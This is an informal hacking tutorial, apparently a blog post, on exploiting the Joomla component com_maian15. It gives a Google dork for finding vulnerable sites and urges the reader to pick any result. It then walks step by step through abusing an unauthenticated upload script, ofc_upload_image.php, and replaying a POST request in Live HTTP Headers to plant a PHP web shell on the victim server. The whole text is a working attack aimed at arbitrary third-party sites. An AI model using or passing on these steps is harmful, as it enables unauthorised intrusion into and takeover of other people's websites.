Exploit Joomla: com_maian15
In this tutorial, i'm going to show you how to upload shell using Live Http Header through Joomla component , com_maian15.
Finding Vulnerable Target
Dork : "inurl:option=com_maian15"
Exploit:
/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?
Browser: Mozilla Firefox
1- Firstly, copy the dork and paste in google
2- Choose any site
Exploiting Target
1- Paste the exploit at the end of the site URL.
Example:
www.site.com/index.php?option=com_maian15&view=album&album=9
into
www.site.com/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?
2- If it says,
saving your images to ../tmp-upload-images/
or something similar, it means the site is vulnerable.
3- Now, add name=yourshellname.php at the end of the site URL
Example:
www.site.com/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=bcc.php
4- Hit enter and you will get something like
saving your images to ../tmp-upload-images/bcc.php
5- Now, open up your Firefox extension, Live HTTP Header , and refresh the page.
6- As you can see, in your Live HTTP Header, there is the url of the site. Highlight it and click on replay.
7- Once you clicked replay, a popup will appear, tick on Send POST Content and paste your shell script in the column.
8- Click replay , the page will automatically refresh and your shell is successfully uploaded at
www.site.com/administrator/components/com_maian15/charts/tmp-upload-images/yourshellname.php
That's all the tutorial for today :P Feels free to leave a comment below :D